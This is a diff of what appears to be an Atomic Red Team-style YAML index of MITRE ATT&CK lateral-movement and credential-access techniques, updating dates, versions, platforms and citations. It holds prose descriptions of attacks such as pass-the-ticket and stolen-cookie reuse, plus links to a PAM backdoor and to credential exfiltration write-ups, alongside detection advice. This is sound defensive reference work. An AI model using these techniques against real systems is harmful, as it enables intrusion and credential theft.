+        description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+          as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+        url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+      - source_name: SC Magazine Ragnar Locker 2021
+        description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+          victims it can read the on-network incident response chat rooms. Retrieved
+          August 30, 2024.
+        url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+      - source_name: Guardian Grand Theft Auto Leak 2022
+        description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+          19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+          Retrieved August 30, 2024.'
+        url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+      - source_name: Microsoft DEV-0537
+        description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+          organizations for data exfiltration and destruction. Retrieved March 23,
+          2022.
+        url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
 lateral-movement:
   T1021.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:20:07.264Z'
       name: Remote Services:VNC
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
@@ -49883,6 +50570,7 @@ lateral-movement:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: lateral-movement
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
 
@@ -49892,7 +50580,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -49908,66 +50595,67 @@ lateral-movement:
       id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
       created: '2020-02-11T18:28:44.950Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1021/005
         external_id: T1021.005
-      - source_name: The Remote Framebuffer Protocol
-        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
-          Framebuffer Protocol. Retrieved September 20, 2021.
-        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: Attacking VNC Servers PentestLab
+        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+          VNC Servers. Retrieved October 6, 2021.
+        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
       - source_name: MacOS VNC software for Remote Desktop
         description: Apple Support. (n.d.). Set up a computer running VNC software
           for Remote Desktop. Retrieved August 18, 2021.
         url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
-      - source_name: VNC Authentication
-        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
-          September 20, 2021.
-        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
-      - source_name: Hijacking VNC
-        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
-          Access and Crack). Retrieved September 20, 2021.'
-        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+      - source_name: Havana authentication bug
+        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+          seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+        url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
       - source_name: macOS root VNC login without authentication
         description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
           root account without authentication. Retrieved September 20, 2021.
         url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
-      - source_name: VNC Vulnerabilities
-        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
-          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
-        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
       - source_name: Offensive Security VNC Authentication Check
         description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
           6, 2021.
         url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
-      - source_name: Attacking VNC Servers PentestLab
-        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
-          VNC Servers. Retrieved October 6, 2021.
-        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
-      - source_name: Havana authentication bug
-        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
-          seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
-        url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
-      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
-        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
-          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
-          August 19, 2021.'
-        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
       - source_name: Gnome Remote Desktop grd-settings
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
       - source_name: Gnome Remote Desktop gschema
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+          August 19, 2021.'
+        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+      - source_name: VNC Vulnerabilities
+        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+      - source_name: The Remote Framebuffer Protocol
+        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+          Framebuffer Protocol. Retrieved September 20, 2021.
+        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: VNC Authentication
+        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+          September 20, 2021.
+        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+      - source_name: Hijacking VNC
+        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+          Access and Crack). Retrieved September 20, 2021.'
+        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.005
     atomic_tests: []
   T1080:
     technique:
-      modified: '2023-05-31T12:33:20.915Z'
+      modified: '2024-10-15T16:07:36.903Z'
       name: Taint Shared Content
       description: |2-
 
@@ -49992,11 +50680,11 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
       - Linux
       - macOS
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Network Share: Network Share Access'
       - 'Process: Process Creation'
@@ -50019,9 +50707,8 @@ lateral-movement:
         url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.004:
     technique:
@@ -50072,7 +50759,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.004
     atomic_tests:
     - name: ESXi - Enable SSH via PowerCLI
@@ -50179,7 +50865,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1021.008:
@@ -50250,7 +50935,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.001:
     technique:
@@ -50287,7 +50971,7 @@ lateral-movement:
         url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
         description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
           11 security incident. Retrieved February 17, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-23T23:11:24.682Z'
       name: SSH Hijacking
       description: |-
         Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -50318,8 +51002,6 @@ lateral-movement:
       - root
       x_mitre_system_requirements:
       - SSH service enabled, trust relationships configured, established connections
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1021.002:
     technique:
@@ -50402,12 +51084,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.002
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -50434,6 +51115,7 @@ lateral-movement:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -50451,12 +51133,12 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -50482,14 +51164,13 @@ lateral-movement:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021:
     technique:
@@ -50607,7 +51288,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563:
     technique:
@@ -50661,11 +51341,10 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.006:
     technique:
-      modified: '2023-08-11T15:26:41.941Z'
+      modified: '2024-09-12T15:28:23.398Z'
       name: 'Remote Services: Windows Remote Management'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -50717,14 +51396,13 @@ lateral-movement:
           April 27, 2016.
         url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
       - source_name: Microsoft WinRM
-        description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa384426
+        description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.006
     atomic_tests: []
   T1021.003:
@@ -50810,12 +51488,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.003
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -50835,6 +51512,7 @@ lateral-movement:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -50842,7 +51520,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -50858,39 +51535,40 @@ lateral-movement:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1021.007:
     technique:
-      modified: '2023-04-14T22:27:04.095Z'
+      modified: '2024-10-15T15:52:47.255Z'
       name: Cloud Services
       description: "Adversaries may log into accessible cloud services within a compromised
         environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -50915,12 +51593,11 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
-      - Azure AD
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       type: attack-pattern
@@ -50934,13 +51611,12 @@ lateral-movement:
         external_id: T1021.007
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -50957,7 +51633,7 @@ lateral-movement:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -51005,7 +51681,7 @@ lateral-movement:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -51038,7 +51714,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1210:
@@ -51077,7 +51752,7 @@ lateral-movement:
         description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
           Detail. Retrieved April 3, 2018.
         source_name: NVD CVE-2014-7169
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-24T15:06:46.006Z'
       name: Exploitation of Remote Services
       description: |-
         Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -51111,12 +51786,10 @@ lateral-movement:
         and goal, the system and exploitable service may need to be remotely accessible
         from the internal network.
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1534:
     technique:
-      modified: '2024-02-16T13:09:39.215Z'
+      modified: '2024-10-15T15:59:36.741Z'
       name: Internal Spearphishing
       description: |-
         After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -51144,10 +51817,9 @@ lateral-movement:
       - Windows
       - macOS
       - Linux
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -51177,7 +51849,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1570:
     technique:
@@ -51239,12 +51910,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1570
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -51268,11 +51938,10 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -51297,9 +51966,8 @@ lateral-movement:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.002:
     technique:
@@ -51359,7 +52027,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1563.002
     atomic_tests: []
   T1550.002:
@@ -51414,7 +52081,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1021.001:
@@ -51482,12 +52148,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.001
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -51544,6 +52209,7 @@ lateral-movement:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -51554,13 +52220,12 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -51619,7 +52284,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 credential-access:
   T1557:
@@ -51713,49 +52377,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
